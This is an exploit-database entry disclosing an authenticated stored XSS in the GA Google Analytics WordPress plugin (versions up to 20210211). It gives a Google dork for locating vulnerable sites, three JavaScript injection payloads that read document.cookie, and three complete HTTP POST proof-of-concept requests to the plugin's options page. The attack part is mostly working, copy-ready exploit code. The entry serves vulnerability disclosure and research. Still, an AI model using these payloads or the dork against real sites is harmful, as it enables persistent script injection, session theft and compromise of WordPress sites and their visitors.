GA Google Analytics WordPress Plugin < = 20210211 - Multiple Authenticated Persistent XSS
CVE
Category
Price
Severity
CVE-2021-24181
CWE-79
$5,000
High
Author
Risk
Exploitation Type
Date
Cybersecurity Researcher
High
Remote
2021-05-17
CPE
cpe:cpe:/a:google_analytics:google_analytics_wordpress_plugin
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021050090 GA Google Analytics WordPress Plugin <= 20210211 - Multiple Authenticated Persistent XSS /*!
- # VULNERABILITY: GA Google Analytics WordPress Plugin <= 20210211 - Authenticated Persistent XSS
- # GOOGLE DORK: inurl:/wp-content/plugins/ga-google-analytics/
- # DATE: 2021-04-04
- # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ]
- # VENDOR: Jeff Starr [ https://plugin-planet.com ]
- # SOFTWARE VERSION: <= 20210211
- # SOFTWARE LINK: https://wordpress.org/plugins/ga-google-analytics/
- # CVSS: AV:N/AC:L/PR:H/UI:N/S:C
- # CWE: CWE-79
- # CVE: N/A
*/
### -- [ Info: ]
[i] An Authenticated Persistent XSS vulnerability was discovered in the GA Google Analytics plugin through v20210211 for WordPress.
[i] Vulnerable parameter(s): &gap_options[gap_id]=, &gap_options[tracker_object]=, &gap_options[gap_custom_code]=.
### -- [ Impact: ]
[~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.
### -- [ Payloads: ]
[$] GA Tracking ID: 13"' ' m0ze=m0ze= onload=alert(document.cookie); //
[$] Custom Tracker Objects: '');alert(document.cookie);alert('m0ze'
[$] Custom Tracker Objects (Part #1): '\');alert(document.cookie);/* | Custom GA Code (Part #2): */;
### -- [ PoC #1 | Authenticated Persistent XSS | GA Tracking ID: ]
[!] POST /wp-admin/options.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 459
Cookie: [admin cookies]
option_page=gap_plugin_options&action=update&_wpnonce=a85709d61b&gap_options%5Bgap_id%5D=13%22%27+%27+m0ze%3Dm0ze%3D+onload%3Dalert%28document.cookie%29%3B+%2F%2F&gap_options%5Bgap_enable%5D=2&gap_options%5Bgap_location%5D=header&gap_options%5Btracker_object%5D=&gap_options%5Bgap_custom_code%5D=&gap_options%5Bgap_custom%5D=
### -- [ PoC #2 | Authenticated Persistent XSS | Custom Tracker Objects: ]
[!] POST /wp-admin/options.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 449
Cookie: [admin cookie]
option_page=gap_plugin_options&action=update&_wpnonce=a85709d61b&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dga-google-analytics%26settings-updated%3Dtrue&gap_options%5Bgap_id%5D=m0ze&gap_options%5Bgap_enable%5D=1&gap_options%5Bgap_location%5D=header&gap_options%5Btracker_object%5D=%27%27%29%3Balert%28document.cookie%29%3Balert%28%27m0ze%27&gap_options%5Bgap_custom_code%5D=&gap_options%5Bgap_custom%5D=
### -- [ PoC #3 | Authenticated Persistent XSS | Custom Tracker Objects & Custom GA Code: ]
[!] POST /wp-admin/options.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 445
Cookie: [admin cookie]
option_page=gap_plugin_options&action=update&_wpnonce=a85709d61b&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dga-google-analytics%26settings-updated%3Dtrue&gap_options%5Bgap_id%5D=m0ze&gap_options%5Bgap_enable%5D=1&gap_options%5Bgap_location%5D=header&gap_options%5Btracker_object%5D=%27%5C%27%29%3Balert%28document.cookie%29%3B%2F*&gap_options%5Bgap_custom_code%5D=*%2F%3B&gap_options%5Bgap_custom%5D=
### -- [ Contacts: ]
[+] Website: m0ze.ru
[+] GitHub: @m0ze
[+] Telegram: @m0ze_ru
[+] Twitter: @vladm0ze
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only.Terms of Use and Privacy Policy and Impressum